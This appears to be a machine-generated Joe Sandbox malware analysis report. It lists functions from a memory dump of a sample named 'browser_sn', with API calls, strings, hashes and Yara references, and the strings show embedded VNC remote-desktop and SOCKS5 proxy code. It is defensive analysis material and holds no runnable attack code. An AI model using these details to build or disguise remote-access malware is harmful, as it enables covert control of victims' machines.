                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseInputOpen
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 1367241101-3977938048
                                                                            • Opcode ID: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                                            • Instruction ID: 8533eee4836a91944d6ae3daa74dfe53b7c62f8ae51d06c90250ae1722b71227
                                                                            • Opcode Fuzzy Hash: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                                            • Instruction Fuzzy Hash: 58C19122A0869185F7A08F25C4587FE7BB1EB86B8DF194136CE8C877A5CFB9E445C740
                                                                            Function 00007FF6C2BA7BB4 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 210COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$CloseInputOpen
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 1367241101-3977938048
                                                                            • Opcode ID: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                                            • Instruction ID: 75cc437fed6f5740296840b8ed672c564f820aeaaa978c8bcccd008c7e563d8a
                                                                            • Opcode Fuzzy Hash: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                                            • Instruction Fuzzy Hash: 7DB18022A0869185E7A0CF25C4587BE7BB1EB86B8EF594131CE8C877A5CFB9E445C740
                                                                            Function 00007FF6C2BA593D Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 201COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                            • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                            • API String ID: 186452611-3977938048
                                                                            • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                            • Instruction ID: 6ebaef245fd90a8e0826d954f08872c0f8c88bfc9146121b43ece580b320eb7c
                                                                            • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                            • Instruction Fuzzy Hash: 89A18F22A0868185F790DF25C4587BE7BB1EB86B8EF594032CE8C877A5CFB9E445C740
                                                                            Function 00007FF6C2BB00F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDeviceCaps.GDI32 ref: 00007FF6C2BB0113
                                                                            • GetDeviceCaps.GDI32 ref: 00007FF6C2BB0140
                                                                            • GetDeviceCaps.GDI32 ref: 00007FF6C2BB016D
                                                                              • Part of subcall function 00007FF6C2B8A040: OpenInputDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A07A
                                                                              • Part of subcall function 00007FF6C2B8A040: GetCurrentThreadId.KERNEL32 ref: 00007FF6C2B8A083
                                                                              • Part of subcall function 00007FF6C2B8A040: GetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A08B
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0A6
                                                                              • Part of subcall function 00007FF6C2B8A040: MessageBoxA.USER32 ref: 00007FF6C2B8A0B7
                                                                              • Part of subcall function 00007FF6C2B8A040: SetThreadDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0C2
                                                                              • Part of subcall function 00007FF6C2B8A040: CloseDesktop.USER32(?,?,?,00007FF6C2B882D7), ref: 00007FF6C2B8A0CB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Desktop$Thread$CapsDevice$CloseCurrentInputMessageOpen
                                                                            • String ID: WinVNC$vncDesktop : current display is PLANAR, not CHUNKY!WinVNC cannot be used with this graphics device driver$vncdesktop.cpp : DBG:display context has %d planes!$vncdesktop.cpp : DBG:memory context has %d planes!
                                                                            • API String ID: 3271485511-23260621
                                                                            • Opcode ID: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                            • Instruction ID: b039628b68cc13aa1fe4a0970416290fd62c20453433962459e2d32e7d1fa5f9
                                                                            • Opcode Fuzzy Hash: aceaff558d4e77a2f2eec4c4dc82cdcf6baf6394409946313555329e23b774f0
                                                                            • Instruction Fuzzy Hash: A7218C766081C285E7048FB5C8407F82761EF69B0EF480436CE8CDA799DEACD196C324
                                                                            Function 00007FF6C2BEA3B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 51threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Thread$Desktop$CurrentInformationObjectUser
                                                                            • String ID: vncservice.cpp : !GetUserObjectInformation $vncservice.cpp : SelectHDESK to %s (%x) from %x$vncservice.cpp : SelectHDESK:!SetThreadDesktop
                                                                            • API String ID: 3041254040-2700308907
                                                                            • Opcode ID: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                            • Instruction ID: a426129472c600fb62c501d9b4d2c71121ca81128c9d90e506acbecfe9a354a9
                                                                            • Opcode Fuzzy Hash: 4f8d2c7db47c5d763c9f183b5bfa44873fa21b71b4771b800020d903ae877d61
                                                                            • Instruction Fuzzy Hash: A4211A35A08A8281EBA09F51A8053E663B4BF8A74EF840072DECE86754DEBCE055C740
                                                                            Function 00007FF6C2C17400 Relevance: 12.1, APIs: 8, Instructions: 62synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleValueWait
                                                                            • String ID:
                                                                            • API String ID: 3883107862-0
                                                                            • Opcode ID: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                            • Instruction ID: a321bcab2be3f20a920f8acfc4bf275f0b112919d68aa2dbfc88dcda8ed71258
                                                                            • Opcode Fuzzy Hash: 2d3a207cf1e61dbd628a562107760b45f8588eac2b273cc230bde13b8ab52e88
                                                                            • Instruction Fuzzy Hash: A8310636A08B4286EB90DF20E4452A973B0FB98B99F440532CF8D83765CFBCE499C740
                                                                            Function 00007FF6C2C49A94 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 240COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00007FF6C2C437C4: GetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437CE
                                                                              • Part of subcall function 00007FF6C2C437C4: FlsGetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C437DC
                                                                              • Part of subcall function 00007FF6C2C437C4: FlsSetValue.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43808
                                                                              • Part of subcall function 00007FF6C2C437C4: GetCurrentThreadId.KERNEL32 ref: 00007FF6C2C4381C
                                                                              • Part of subcall function 00007FF6C2C437C4: SetLastError.KERNEL32(?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19,?,?,?,00007FF6C2C3748C), ref: 00007FF6C2C43834
                                                                              • Part of subcall function 00007FF6C2C432EC: Sleep.KERNEL32(?,?,?,00007FF6C2C437F7,?,?,?,00007FF6C2C3FFD1,?,?,?,?,00007FF6C2C38C19), ref: 00007FF6C2C43331
                                                                            • _errno.LIBCMT ref: 00007FF6C2C49D9C
                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C2C49DA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                                            • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                                            • API String ID: 1962487656-880385205
                                                                            • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                            • Instruction ID: 770f264e69002573919cad4cb9d160e93397721197c579b2cf8b87761c129e56
                                                                            • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                            • Instruction Fuzzy Hash: A19104736041918BEB99CE38C4946A93BB1D7A1709F08C135DF88CB796DE79E509C742
                                                                            Function 00007FF6C2B8C0C0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 201networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                                            • String ID: SOCKS5_AUTH
                                                                            • API String ID: 788663964-1698957378
                                                                            • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                            • Instruction ID: 6f46347282f7a980984c9ce4fb8ceb10c2042237436bdc8751b8c3c5e3e88078
                                                                            • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                            • Instruction Fuzzy Hash: D7812C6271C74380E7A48F29A5406BA6791EF8679EF445132EEDDC7BC5EEACE405C700
                                                                            Function 00007FF6C2B9E320 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
                                                                            • String ID: P$vncclient.cpp : init update thread
                                                                            • API String ID: 1414418286-2218817233
                                                                            • Opcode ID: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                            • Instruction ID: e92e7fb1370cc92918af48e6078a16ecbbfb535d25f9c05107978827c8d00d7d
                                                                            • Opcode Fuzzy Hash: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                            • Instruction Fuzzy Hash: 9C411B32609B8186D7949F25E4503AD73A0FB49B99F484136DBDE83B94DFBCE468C301
                                                                            Function 00007FF6C2B977C0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 88sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                                            • String ID: keyEvent$start_event$stop_event
                                                                            • API String ID: 2894921085-1979648887
                                                                            • Opcode ID: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                            • Instruction ID: 14403f335047290e7002dec8ab9dff17c0eafc46ee1a828d754f7b8649280a18
                                                                            • Opcode Fuzzy Hash: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                            • Instruction Fuzzy Hash: 88410860E1DA4381FB50AF16B4947B527A0AFA674EF400135DECEC7BA2CEACA494D351
                                                                            Function 00007FF6C2BD6FF0 Relevance: 10.6, APIs: 7, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                            • String ID:
                                                                            • API String ID: 3112530957-0
                                                                            • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                            • Instruction ID: 1174e1247f028eab76e2381e418727856b35746785636ff3df03f0355b498f5d
                                                                            • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                            • Instruction Fuzzy Hash: 9E41F4729086C18AE364DF34E445699BBB0F748B19F444939EF999B788DF78E5048F20
                                                                            Function 00007FF6C2BABBF0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CloseDeleteEnterFileHandleLeave
                                                                            • String ID: !UVNCDIR-$f
                                                                            • API String ID: 753559762-4271271459
